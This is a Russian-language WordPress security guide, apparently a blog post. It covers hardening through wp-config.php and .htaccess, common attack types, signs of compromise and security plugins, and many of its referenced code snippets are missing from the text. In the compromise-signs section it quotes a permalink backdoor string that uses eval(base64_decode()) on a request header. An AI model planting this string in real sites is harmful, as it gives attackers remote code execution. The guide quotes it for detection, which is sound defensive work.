»  Безопасность  »  Безопасность Вордпресс. Полное руководство

Безопасность Вордпресс. Полное руководство

Полное руководство по безопасности ВордпрессСогласно статистике, хакеры атакуют сайты на Вордпресс примерно 90.000 раз в минуту. Некоторые думают, что сайт в безопасности, потому что он не представляет интереса для хакеров, но это не так. В большинстве случаев для хакеров не имеет значения кому принадлежит сайт, возраст сайта, размер сайта, содержание сайта и так далее. Хакеры взламывают сайты для того, чтобы получить контроль над узлом сети и использовать ресурсы этого узла.

Обычно хакеры взламывают сайты для рассылки спама, редиректа на свои сайты, кражи личных данных и использования сервера в качестве хранилища какой-нибудь информации или файлообменника. Очень редко хакеры взламывают какой-то конкретный сайт. В большинстве случаев хакеры при помощи ботов автоматически взламывают десятки сайтов, и используют ресурсы этих сайтов для своих дел.

В этой статье вы узнаете, какими способами можно обезопасить сайт, как Вордпресс может быть атакован, как злоумышленники могут получить доступ к сайту, какие признаки у взломанного сайта, что можно сделать, если сайт был взломан и какие плагины для безопасности сайта вы можете использовать.

Способы защиты из этой статьи по порядку применения в Минимальной безопасности Вордпресс.

Содержание:

  1. Дополнения в wp-config.php
  2. Добавьте правила в .htaccess
  3. Удалите ненужные файлы
  4. Измените структуру расположения файлов и папок
  5. Измените имя пользователя по умолчанию
  6. Удалите пользователя с ID 1
  7. Измените текст ошибки при входе на сайт
  8. Измените адрес входа на сайт
  9. Удалите версию Вордпресс

Как поддерживать безопаность сайта

  1. Используйте плагин безопасности
  2. Регулярно сканируйте сайт
  3. Просматривайте логи событий
  4. Проверьте права доступа к файлам и папкам
  5. Отключите XML-RPC
  6. Как бороться со спамом
  7. Используйте двух-факторную авторизацию
  8. Дополнительные изменения в файле wp-config.php
  9. Дополнительные изменения в файле .htaccess
  10. Ограничьте попытки доступа на сайт
  11. Установите файрвол на сервере

Насколько безопасен Вордпресс

На Вордпрессе работает более 30% сайтов в Интернете, и он является самой популярной системой управления контентом. Более 80% атак на CMS приходится на Ворпресс, но он остается самой популярной платформой.

Разработчики Вордпресс постоянно работают над устранением найденных уязвимостей и выпускают обновления ядра Вордпресс.

C момента выхода первой версии Вордпресс было выпущено около 2.500 исправлений уязвимостей. Были случаи, когда обновления выходили менее чем через 40 минут после обнаружения уязвимости.

Для максимальной безопасности сайта нужно обновлять ядро Вордпресс. Можно включить автоматическое обновление, или оставить обновление в ручном режиме.

Правило безопасности №1 — регулярное обновление версии Вордпресс. Другие меры безопасности тоже нужны, но они становятся менее эффективными, если ядро Вордпресс не обновлено.

Почему ваш сайт является целью для злоумышленников

Вордпресс достаточно безопасен, но дело в том, что все сайты на Вордпресс являются целью для хакеров. Даже абсолютно новый сайт без контента, без трафика, с обновленным ядром может быть взломан хакерами и использован в своих целях.

Все Вордпресс сайты являются целью для хакеров из-за своей популярности. Хакеры пишут ботов, которые обходят сотни тысяч сайтов и сканируют их на списки уязвимостей. Чем больше сайтов будет просканировано, тем выше вероятность найти уязвимость и получить какой-то контроль над сайтом.

В конце 2017 года около 75 млн. сайтов в Интернете работало на Вордпресс, поэтому вероятность что-то найти достаточно высока.

Молодые сайты обычно менее защищены от атак, потому что их владельцы думают, что их сайты не представляют интереса для хакеров, но на самом деле молодые сайты — одна из целей хакеров, потому что их проще взломать.

Большие сайты тоже являются целью хакеров, потому что большой аудитории сайта можно начать рассылать спам.

Как хакеры взламывают сайты

Когда разработчики пишут код, практически невозможно не оставить какую-то уязвимость в безопасности. Когда хакеры находят эти дыры, они используют их, чтобы взломать сайт.

Другие способы получить контроль над сайтом — использование человеческих ошибок, например, слишком простые пароли, или ненадежный или небезопасный хостинг.

Список основных типов угроз для Вордпресс:

  • Межсайтовое выполнение сценариев (XSS, Cross-site Scripting) — хакер внедряет какой-то код на страницу сайта, при загрузке страницы скрипт выполняется на компьютере посетителя.
  • SQL внедрения (SQLISQL Injections) — SQL запросы исполняются из строки браузера.
  •  Загрузка файла — файл с вредоносным кодом загружается на сервер.
  • Фальсификация межсайтового запроса (CSRF, Cross-Site Request Forgery) — код или запрос исполняется из строки браузера.
  • Перебор паролей (Brute Force) — множественные попытки подобрать логин и пароль.
  • DoS-атаки (Denial of Servise) — попытка перегрузить и повесить сайт большим количеством трафика от ботов.
  • DDoS-атаки (Distributed Denial of Servise) — попытка повесить сайт из разных мест, например, с зараженных компьютеров или роутеров.
  • Редирект — используется какая-то уязвимость, которая переадресует запрос к странице на постороннюю страницу, обычно с целью кражи личных данных или спама.
  • Кража личных данных (Phishing) — хакеры создают сайт или страницу, которая похожа на какую-то страницу или сайт с целью получения логина и пароля пользователя.
  • Вредоносный код (Malware) — скрипт или программа для заражения сайта.
  • Внедрение файла (LFI, Local File Inclusion) — злоумышленник может контролировать, какой файл исполняется в определенное время по расписанию CMS или какого-то приложения.
  • Обход авторизации (Authentication Bypass) — дыра в безопасности, которая позволяет хакерам обходить форму входа и получать доступ к сайту.
  • Показ пути к сайту (FPD, Full Path Disclosure) — когда отбражается полный путь к корневой папке сайта, видимы папки, логи ошибок и предупреждений.
  • Нумерация пользователей (User Enumeration) — возможность узнать логин пользователей сайта. К URL сайта добавляется запрос ID пользователя, который может вернуть профиль пользователя с его логином. Используется вместе с методом перебора паролей.
  • Обход системы безопасности (Security Bypass) — хакеры обходят систему безопасности и получают доступ к незащищенной части сайта.
  • Удаленное исполнение кода (RCE, Remote Code Execution) — хакер запускает исполнение кода на сайте с другого сайта или компьютера.
  • Удаленное внедрение файла (RFI, Remote File Inclusion) — использование ссылки на внешний скрипт для загрузки вредоносного кода с другого компьютера или сайта.
  • Подделка запроса на стороне сервера (SSRF, Server Side Request Forgery) — хакер управляет сервером частично или полностью для выполнения удаленных запросов.

Это основные уязвимости Вордпресс, которые хакеры используют для взлома, в основном при помощи ботов. Боты также могут найти сразу несколько уязвимостей.

Согласно исследованию WP WhiteSecurity, 54% уязвимостей выявлено в плагинах Вордпресс, 31,5% уязвимостей в ядре Вордпресс и 14,3% уязвимостей — в темах Вордпресс.

Уязвимости Вордпресс

Распространение типов уязвимостей согласно Wordfence и WP WhiteSecurity:

Типы уязвимостей Вордпресс

Типы уязвимостей WordPress, исследование Wordfence

Типы уязвимостей Вордпресс

Типы уязвимостей WordPress, исследование WP WhiteSecurity

Другое исследование WP WhiteSecurity, проведенное на 42.000 сайтах из рейтинга Алекса Топ-1.000.000, говорит о том, что 73,2% сайтов имеют уязвимости из-за необновленной версии Вордпресс.

Основные требования к безопасности сайта

От безопасности вашего компьютера зависит безопасность вашего сайта. Вредоносное ПО и вирусы могут заразить ваш сайт и сотни других сайтов.

Эти рекомендации увеличат безопасность вашего компьютера и сайта:

  1. Используйтете антивирус и файрвол на вашем компьютере.
  2. Не заходите на свой сайт в публичных местах, так как данные, которые вы пересылаете через публичный Wi-Fi, могут быть перехвачены злоумышленниками.
  3. Не используйте небезопасные сети или соединения.
  4. Используйте надежный хостинг.
  5. Используйте сложные пароли для входа на сайт. Установите рекомендуемый минимум сложности паролей для других пользователей сайта.
  6. Подумайте о выключении возможности для пользователей загружать картинки на сайт. Злоумышленник может загрузить скрипт на сайт под видом аватара с названием avatar.jpg.php, который может использовать какую-то уязвимость.
  7. Используйте безопасный FTP (FTPS) вместо обычного FTP.
  8. Вместо FTP вы можете использовать SSH (SFTP), так как он безопаснее FTP.
  9. Давайте доступ к админской или редакторской части только тем, кому вы доверяете.
  10. Давайте доступ к хостингу и FTP только тем, кому доверяете. Вы можете создать еще один аккаунт с уменьшенными правами и дать доступ к нему.
  11. Если вы не пользуетесь FTP, удалите или отключите подключения.
  12. Настройте бэкап сайта.
  13. Регулярно обновляйте Вордпресс, плагины и темы.
  14. Не одобряйте непонятные комментарии с бэклинками.
  15. Используйте популярные плагины с большим количеством установок и частым обновлением.
  16. Установите SSL сертификат на сайт.
  17. Используйте CDN, это помогает предотвратить DoS и DDoS атаки.

Как скрыть данные о Вордпресс

Скрытие данных о Вордпресс, например, версии ядра или изменение адреса входа в админку, является еще одним способом увеличить безопасность сайта.

Еще в одном исследовании WP WhiteSecurity говорится, что только 8% сайтов было взломано вручную методом перебора паролей, 92% сайтов были взломаны ботами автоматически, 41% — через уязвимости в ПО хостинга, 29% — через уязвимости в файлах темы, 22% — через уязвимости в плагинах.

Боты пытаются взломать сайт по заранее определенному алгоритму. Если взлом по списку уязвимостей не удался — они уходят на другие сайты. Перебор паролей на странице входа в админку и использование списка уязвимостей версий Вордпресс — обычная практика этих ботов.

Скрытие информации о Вордпресс может помочь в некоторых случаях, но не во всех, поэтому используйте этот метод вместе с другими инструментами безопасности.

WP-Config.php

Это главный файл сайта, который находится в корневой папке. Добавляйте свои записи в wp-config перед строкой:

/* Это всё, дальше не редактируем. Успехов! */

или

/* That’s all, stop editing! Happy blogging. */

Отключите редактирование файлов в панели Вордпресс

В панели администратора находится редактор файлов, в котором вы можете редактировать файлы установленных плагинов и тем.

Редактировать файлы тем вы можете в разделе Внешний вид — Редактор, файлы плагинов в разделе Плагины — Редактор.

Многие разработчики считают доступ к редактированию файлов в панели Вордпресс опасным, потому что если хакер попадет в админскую часть сайта, у него появится доступ к этим файлам.

Другие разработчики считают, что если злоумышленник получил доступ к админской части сайта, то уже ничего не поможет.

Возможно, запрет на редактирование php файлов в админке даст вам некоторое время, чтобы попробовать вернуть контроль над сайтом. Выключить редактирование файлов в админке можно так:

Переместите файл wp-config.php

В вашем файле wp-config.php находится много важной информации, которая не должна быть доступна посторонним. Вы можете переместить этот файл в другое место, чтобы хакеры не смогли найти его в его обычном месте.

Если ваш сайт находится в корневой папке, вы можете перенести wp-config.php на один уровень вверх.

Или вы можете перенести этот файл в любое другое место, для этого создайте в той же папке новый файл с тем же именем, и вставьте в него этот код:

Замените  /путь/к/wp-config.php на ваш адрес к файлу после перемещения.

Измените префикс базы данных

Таблицы базы данных имеют по умолчанию префикс wp_. Смените префикс на что-нибудь другое, чтобы усложнить задачу хакерам.

Для изменения префикса базы данных надо внести изменения в файл wp-config.php и базу данных.

Добавьте правила в .htaccess

Вы можете добавить эти правила в .htaccess, чтобы скрыть некоторые данные о сайте.

Запретите доступ к важным файлам

Вы можете закрыть доступ к критическим файлам wp-config.phphtaccessphp.ini и логам ошибок. Добавьте это правило из Кодекса Вордпресс:

Если у вас есть файл php5.ini или php7.ini вместо php.ini, замените php.ini в первой строке на ваш файл.

Запретите доступ к PHP файлам

В дополнение к предыдущему правилу, ограничьте доступ к php файлам, так как хакеры могут внедрить в них вредоносный код.

Запретите доступ к папке wp-includes

В папке wp-includes находятся важные файлы, которые могут быть использованы для взлома сайта.

Добавьте это правило, чтобы защитить /wp-includes/:

Ограничьте доступ к странице авторизации

Когда хакер получает доступ к странице входа на сайт (по умолчанию /wp-login.php) и пытается подобрать логин и пароль к аккаунту администратора, это называется brute force attack, или атака грубой силой, или атака методом перебора паролей. Ограничьте пользователей, которым разрешено заходить на страницу входа и получать доступ к панели администратора, это уменьшит количество таких атак.

Хотя хакеры попадают на страницу входа с помощью ботов без реального посещения страницы, вы все равно увидите значительное снижение количества атак с перебором паролей, если добавите это правило в .htaccess.

Вы можете запретить доступ нескольким статическим IP адресам:

Строки 1 и 2 перенаправляют посетителя на страницу с ошибкой 404, если они пришли не с адресов, указанных в этом правиле. Это правило не вызывает ситуацию бесконечных редиректов, так что ваш сайт не будет выглядеть как зависший.

Замените  /путь-к-вашему-сайту/ в двух первых строчках на свой адрес.
Замените  IP Адрес 1IP Адрес 2 и IP Адрес 3 на те IP адреса, с которых вы хотите иметь доступ к страницам wp-login.php и wp-admin.

Если вам нужен только один IP адрес, удалите строки 10 и 11, если вам нужно больше адресов, добавьте нужное количество строк.

Не забудьте дополнить или отключить это правило если вы поедете путешествовать, иначе вы попадете на страницу 404.

Если вы или другой пользователь имеете динамические IP (или Мультисайт), используйте следующее правило:

Замените  /путь-к-вашему-сайту/ и  /ваш-сайт.ru/  на свой адрес.

Хакеры используют ботов, чтобы пытаться попасть в админку Вордпресс. Это правило определяет, что только те пользователи, которые вручную набрали wp-login.php или wp-admin в браузере, получат доступ к этим страницам.

Этот способ не защитит от хакеров, которые вручную набирают адрес страницы входа на сайт, но значительно уменьшит количество атак с перебором паролей.

Запретите доступ к директориям сайта

Хакер может получить доступ к папкам сайта, если введет в адресной строке полный путь к нужной папке.

Например, злоумышленник может увидеть содержимое папки uploads, если введет в адресной строке  ваш-сайт.ru/wp-content/uploads/.

Хотя редактировать эти файлы будет невозможно если у вас настроены разрешения, лучше запретить доступ к этим папкам.

Чтобы закрыть доступ к директориям сайта, добавьте это правило в .htaccess:

Отключите нумерацию пользователей

Если злоумышленник введёт в строку адреса ваш-сайт.ru/?author=1, он будет перенаправлен на страницу пользователя с ID = 1.

В этом случае хакер будет знать имя пользователя, и ему останется только узнать пароль.

Даже если пользователи используют сложные пароли, злоумышленнику лучше не знать ID пользователей:

Удалите ненужные файлы

После установки Вордпресс можно удалить несколько файлов, которые больше не нужны.

  • readme.html
  • /wp-admin/install.php
  • wp-config-sample.php

В файле readme.html содержится информация об используемой версии Вордпресс. Хакеры могут использовать публичную информацию об уязвимостях используемой версии Вордпресс, чтобы проникнуть на ваш сайт.

Измените структуру расположения файлов и папок

Вордпресс — открытая платформа, информация о которой находится в открытом доступе, поэтому хакеры могут использовать какую-то информацию о Вордпресс для взлома сайта.

Например, они могут посмотреть стандартную структуру расположения файлов и папок, и решить, как они будут пытаться проникнуть на сайт.

Измените имя пользователя по умолчанию

Когда вы устанавливаете Вордпресс, администратору сайта по умолчанию дается имя пользователя «admin». Вы можете оставить как есть, но тогда злоумышленнику останется только подобрать пароль к этому аккаунту, так как имя пользователя «admin» одно из стандартных имен, которое пробуется ботами, когда они пытаются попасть на сайт методом перебора паролей.

Если вы измените имя пользователя, это добавит трудностей хакерам для проникновения на сайт через подбор логина и пароля.

Удалите пользователя с ID 1

При установке Вордпресс по умолчанию создается пользователь с правами администратора с ID=1. Вы уже знаете об изменении имени пользователя, но кроме этого можно изменить ID администратора сайта.

Создайте нового пользователя с правами администратора, зайдите на сайт под новым аккаунтом и удалите старого администратора с ID 1.

С другой стороны, некоторым плагинам требуются дополнительные права для реализации их функций, которых у них может не быть, если создать нового пользователя с правами администратора.

Измените текст ошибки при входе на сайт

По умолчанию Вордпресс показывает сообщение с ошибкой, когда посетитель вводит неправильный логин или пароль на странице входа на сайт. Это сообщение работает как подсказка, давая хакеру понять, что именно было введено неправильно, — логин или пароль.

Когда хакер вводит неверный пароль к верному имени пользователя, Вордпресс возвращает сообщение, что пароль неверный. Это дает ему понять, что имя пользователя верное. Он видит, что такой пользователь существует, и продолжает попытки подбора пароля.

Чтобы изменить текст сообщения, добавьте эти строки в functions.php.

Замените сообщение в строке 3 на свое сообщение.

Измените адрес входа на сайт

Стандартная страница входа на сайт /wp-login.php, вы можете изменить адрес этой страницы на любой другой, например, /login или /1234.html. Теперь хакеру, перед тем как начать пробовать пароли, придется найти страницу, на которой он может это делать.

Хотя хакер может обойти необходимость посещения страницы авторизации, изменение адреса страницы входа уменьшит количество брут-форс атак.

Удалите версию Вордпресс

Список уязвимостей версий Вордпресс находится в открытом доступе, поэтому удаление информации об используемой версии ПО может увеличить безопасность сайта.

Кроме удаления файла readme.html, вы можете удалить все упоминания о версии ядра Вордпресс, версии скриптов и стилей и тег в фиде RSS.

Плагин Clearfy делает это в несколько кликов, но можно это сделать вручную без помощи плагинов.

Как поддерживать безопасность сайта

Безопасность Вордпресс — это устранение как можно большего количества уязвимостей, так как уязвимость — это пропуск на сайт. Хакеры ищут самый простой способ попасть на сайт. Сайты с уязвимостями в безопасности являются для них такой целью. С помощью этого руководства вы можете эффективно отражать 99,99% атак на свой сайт.

Используйте плагин безопасности

Большинство техник из этого руководства можно включить в плагинах безопасности. Установите и настройте один из них, это защитит ваш сайт и вам не нужно будет помнить, какие техники вы применили или могли забыть.

Сам по себе Вордпресс достаточно безопасен если его регулярно обновлять, но хакеры постоянно находят новые уязвимости в ПО. Плагин безопасности поможет защитить ваш сайт, пока разработчики Вордпресс работают над устранением этой уязвимости.

Регулярно сканируйте сайт

После того, как вы установили плагин безопасности, настройте регулярное сканирование. Автоматическое сканирование по расписанию находится в платных плагинах, но в некоторых бесплатных есть ручное сканирование, выберите себе подходящий плагин и старайтесь использовать эту функцию.

Без регулярного сканирования уязвимость может пройти незамеченной, это может привести к взлому сайта, но вы об этом можете не узнать.

Установите частоту сканирования немного меньше, чем частота бэкапа. Если сайт взломают, будет из чего его восстановить.

Просматривайте логи событий

Когда вы устанавливаете сайт на хостинге, в это же время начинают вестись логи событий. Где-то на вашем аккаунте должны храниться логи ошибок и логи доступа.

Обычно называются «Логи», если вы не можете их найти, спросите у техподдержки.

Логи событий — это записи о том, как кто-то получал доступ к сайту, просматривал важные файлы или пытался получить к ним доступ. Если вы будете время от времени просматривать логи, вы можете обратить внимание на какую-то необычную активность.

Например, если обычные посетители пытались получить доступ к файлам .htaccess или wp-config.php. Если вы видите, что какой-то посетитель получил доступ к этим файлам, это может значить, что ваш сайт взломали.

Если вы будете время от времени просматривать логи событий и заметите что-то странное, вы сможете вовремя отреагировать на изменения.

Проверьте права доступа к файлам и папкам

Многие файлы ядра Вордпресс, тем, плагинов, скриптов или загруженные медиафайлы содержат важную информацию. Дайте этим файлам соответствующие права, чтобы у посторонних не было доступа к этим файлам.

Отключите XML-RPC

XML-RPC — это API интерфейс, который используется для доступа к сайту через мобильные приложения, для трекбэков и пингбэков и используется плагином Jetpack. Если вы пользуетесь чем-то из этого, то оставьте эту функцию включенной или частично включенной. С другой стороны, XML-RPC может быть использован хакерами для атак с перебором логинов и паролей.

Вместо того, чтобы пытаться подобрать логин и пароль на обычной странице авторизации, где у вас может быть установлено ограничение на количество попыток входа, через этот интерфейс бот может попробовать тысячи комбинаций логина и пароля без всяких ограничений. Чтобы противодействовать таким атакам используйте сложные логины и пароли. Другая проблема в том, что брут-форс атаки расходуют большое количество ресурсов сервера. Если ваш сайт находится на недорогом хостинге, в результате такой атаки сайт может зависнуть из-за использования всех ресурсов сервера.

Чтобы полностью отключить XML-RPC, добавьте это правило в .htaccess:

Как бороться со спамом

Спам на сайте — это намного больше, чем просто надоедливый мусор. Спам может привести к заражению сайта, брут-форс или DDoS атакам. Защита от спама — одна из составляющих безопасности сайта.

Плагин Kama SpamBlock — очень эффективное средство для борьбы со спамом. Если вы знаете что-то более эффективное — поделитесь этим в комментариях.

Используйте двух-факторную авторизацию

Двух-факторная авторизацация — это идентификация через логин и пароль и дополнительная идентификация через е-мейл или смартфон. Для включения двойной авторизации есть бесплатные плагины, например, Google Two-Factor AuthenticationGoogle Authenticator или Duo Two-Factor Authentication.

Дополнительные изменения в файле wp-config.php

Смените ключи безопасности

В файле wp-config.php находятся ключи безопасности, с помощью которых шифруется информация, хранящаяся в cookies. Меняйте их время от времени, это сделает cookies, хранящиеся в браузерах пользователей, в том числе хакеров, недействительными. Для входа на сайт нужно будет авторизоваться еще раз.

Вы можете сгенерировать новые ключи безопасности в генераторе ключей Вордпресс, скопируйте их оттуда и вставьте в свой файл wp-config.php:

Используйте SSL

После того, как вы установили SSL сертификат на свой домен, включите его принудительное использование, чтобы все посетители сайта подключались к сайту по безопасному соединению.

Чтобы зашифровать логин и пароль во время передачи их серверу, добавьте эту строку:

Чтобы использовать SSL в админской части сайта, например, для шифрования cookies сессии, добавьте эту строку:

Добавьте эти строки в файл wp-config.php перед строкой:

После этого добавьте эту запись в файл .htaccess:

Замените ваш-сайт.ru на свой адрес.

Если у вас уже есть стандартная запись, которую добавляет Вордпресс,

то вы можете добавить в эту запись только строки 3 и 4 из первого правила.

Используйте FTPS

Чтобы использовать FTPS через небезопасное FTP соединение, добавьте это правило перед строкой «Это все, дальше не редактируем»:

Используйте SFTP

Чтобы повысить безопасность SSH подключения, вы можете использовать SFTP соединение, если эта функция включена на хостинге.

Выключите режим debug

По умолчанию режим debug выключен и должен быть выключен до тех пор, пока вы не обнаружите ошибки на сайте.

Если вы хотите включить режим debug и отображение ошибок во фронтэнде, замените false на true.

Включите автообновление Вордпресс

Если вы хотите включить автообновление Вордпресс, добавьте это правило:

Или не добавляйте, если хотите сначала протестировать обновления.

Дополнительные изменения в файле .htaccess

В этом разделе дополнительные правила для повышения безопасности сайта.

Запретите исполнение php файлов

Если ваш сайт был взломан, вы можете отключить возможность исполнения вредоносного кода, который загрузили хакеры. Обычно они добавляют код в папку /wp-content/uploads/.

Добавьте это правило, чтобы отключить возможность исполнять php файлы в папке uploads:

Защитите сайт от внедрения вредоносных скриптов

Вы можете запретить внедрение кода в php файлы. Добавьте это правило:

Ограничьте попытки доступа на сайт

По умолчанию Вордпресс не ограничивает количество попыток входа на сайт. То есть, если посетитель ввел неверный логин или пароль, он может попробовать ввести их еще раз столько раз, сколько захочет. Это дает хакерам возможность перебирать логины и пароли большое количество раз, пока они не подберут верную комбинацию.

Чтобы этого не случилось, установите плагин безопасности, который будет ограничивать количество попыток входа на сайт. Есть специальные плагины для решения только этой задачи, например, Limit Login Attempts Reloaded, или Login LockDown, есть большие плагины безопасности, в которых эта функция находится в числе других, например, Wordfence или All In One WP Security & Firewall.

Установите файрвол на сервере

Вы можете установить файрвол на сервере, это защитит сайт и сервер от хакеров еще на подходе. Не путайте файрвол на сервере с WAF (web application firewall), файрволом на сайте, который находится в плагине Wordfence.

Если хакер уже попал на сайт, то остановить его будет труднее, поэтому лучше остановить его на подходе к сайту, то есть на уровне сервера.

Вы можете попробовать установить бесплатный файрвол ConfigServer Security & Firewall. Перед установкой поговорите с техподдержкой хостинга, скорее всего, у вас не будет прав на установку ПО, и, возможно, какой-то файрвол уже установлен на сервере.

Признаки взломанного сайта

1. Постоянная ссылка. Зайдите в НастройкиПостоянные ссылки. Проверьте, что ничего не добавлено к постоянной ссылке. Постоянная ссылка должна выглядеть как что-нибудь вроде %postname%. Если ссылка изменилась на %postname%/%, например,

%postname%/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/

значит, ваш сайт взломали.

2. Файл .htaccess. Страницы сайта ведут на сайт с Виагрой, казино и тому подобное. Зайдите в свой файл .htaccess, проверьте, не добавились ли новые 301 редиректы. В новой установке Вордпресс файл должен выглядеть так:

3. Редиректы: Подложные редиректы с главной или другой / других страниц сайта. Вредоносный код мог быть добавлен в файл wp-config.php:

или

4. Непонятный контент: Контент, который вы не размещали, — рекламные баннеры, статьи и тому подобное. Проверьте все страницы сайта, включая Главную.

5. Поисковики: Проверьте свой сайт в поисках, нет ли в выдаче «виагры» вместе с вашим сайтом.

Замените ваш-сайт.ru на ваш адрес.

Вставьте эту строку в поисковик, посмотрите, как поисковик видит ваш сайт. Некоторые взломы меняют заголовок страницы на рекламный мусор. Также поисковики пометят ваш сайт как «содержащий вредоносный код», и понизят его в поисковой выдаче.

6. Пользователи сайта: Проверьте пользователей сайта, нет ли неизвестных вам юзеров с правами администратора.

7. Странные таблицы в базе данных: Хакеры могут получить доступ к базе данных и создать новую таблицу с вредоносным кодом, которая может быть похожа на стандартную таблицу Вордпресс. Например, создать новую таблицу wp_pagemeta, которая маскируется под стандартную таблицу wp_postmeta.

Если вы не знаете, взломали сайт или нет, скачайте весь сайт на компьютер и проверьте его антивирусом.

Решение проблем со взломанным сайтом

Если ваш сайт взломали, в этом разделе вы найдете информацию по очистке сайта от вредоносного кода и его возвращению в рабочее состояние.

Предотвратить заражения проще, чем лечение, поэтому применяйте эти рекомендации, чтобы не пришлось лечить сайт.

Плагины безопасности Вордпресс

Wordfence

Плагин безопасности Wordfence

Самый известный и один из самых мощных плагинов безопасности Вордпресс. Платная и бесплатная версии обнаруживают вредоносный код и защищают сайт практически от всех видов угроз. База данных плагина постоянно обновляется, поэтому как только появляется новая угроза, она попадает в базу данных.

В Wordfence есть функция обнаружения изменения или добавления файлов. Когда существующий файл сайта обновляется или добавляется новый файл, Вордфенс сообщает об этом и предлагает отменить изменение или удалить файл.

В Вордфенсе есть функция сканирования файлов на своем сервере, встроенный файрвол и множество других функций.

У плагина более 2-х миллионов установок и высокий рейтинг. Защита самого высокого класса.

iThemes Security

Плагин безопасности iThemes Security

iThemes Security — мощный плагин из тройки лидеров. У него есть база с последними хаками, бэкдорами и другими угрозами.

Бесплатная версия хорошо защищает чистый сайт, имеет более 30 функций, но если вы хотите знать, когда файлы изменялись и делать подробный скан сайта, вам нужно купить премиум версию.

Еще одна крутая функция этого плагина — бэкап сайта. Если вы узнали, что сайт был взломан, вместо поиска взлома вы можете восстановить более раннюю версию сайта.

All In One WP Security & Firewall

Плагин безопасности All in One WordPress Security & Firewall

Большой бесплатный плагин со множеством настроек, имеет встроенный файрвол, защищает файлы сайта и базу данных, большинство функций работают в пассивном режиме, потребляет мало ресурсов. В платной версии есть сканер сайта на наличие вредоносного ПО.

Проверяет файлы и базу данных, сообщает, если были какие-то изменения, меняет стандартную страницу авторизации, скрывает версию Вордпресс, меняет префикс базы данных и еще десятки других функций. Ко всем функциям есть подробные описания.

Плагин скорее предназначен для предупреждения заражений, чем для лечения, поэтому его лучше устанавливать на свежий или вылеченный сайт.

Security Ninja

Плагин Security Ninja

Один из самых простых, но мощных премиум плагинов безопасности. В бесплатной версии проверяет сайт на наличие типичных уязвимостей и предлагает инструкции по устранению этих уязвимостей.

В платной версии добавляется автонастройка функций плагина, сканер ядра, который сравнивает файлы вашей установки Вордпресс с оригинальными файлами на сайте Вордпресс, сканер сайта на наличие вредоносного ПО и облачный файрвол, в который добавляются IP, распространяющие вредоносное ПО и спам.

Весь плагин можно настроить за 15 минут.

Sucuri Security

Плагин безопасности Sucuri Security

Еще один популярный бесплатный плагин, который помогает укрепить защиту сайта, сканирует сайт на наличие вредоносного ПО и других угроз, проверяет, если сайт был занесен в черные списки, и помогает очистить сайт, если он был взломан.

В случае появления какой-то подозрительной активности на сайте, плагин вам об этом сообщит. В платной версии добавляется файрвол.

BulletProof Security

Плагин безопасности Bulletproof Security

Еще один плагин, который вы можете использовать. У этого плагина есть премиум версия, в которой доступен полный бэкап сайта и несколько других опций для повышения безопасности.

Defender Security, Monitoring, and Hack Protection

Плагин безопасности Defender

Хороший плагин с простым интерфейсом. Большинство функций доступно только в платной версии.

SecuPress

Плагин безопасности Secupress

Плагин сканирует сайт на наличие вредоносного кода, блокирует ботов и подозрительные IP адреса. Как и другие плагины. В платной версии доступно больше опций.

SiteLock Security

Плагин безопасности Sitelock Security

Бесплатный плагин с множеством функций, сканирует сайт на уязвимости с обновлениями в реальном времени.

Надеюсь, статья была полезна. Оставляйте комментарии.

Метки

Оставьте комментарий